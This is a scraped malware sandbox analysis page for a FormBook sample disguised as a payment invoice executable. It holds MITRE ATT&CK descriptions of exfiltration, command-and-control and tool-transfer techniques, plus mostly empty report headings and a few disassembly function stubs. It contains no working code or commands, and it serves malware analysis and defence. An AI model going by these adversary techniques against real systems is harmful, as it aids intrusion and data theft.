Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 00419E8C, Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON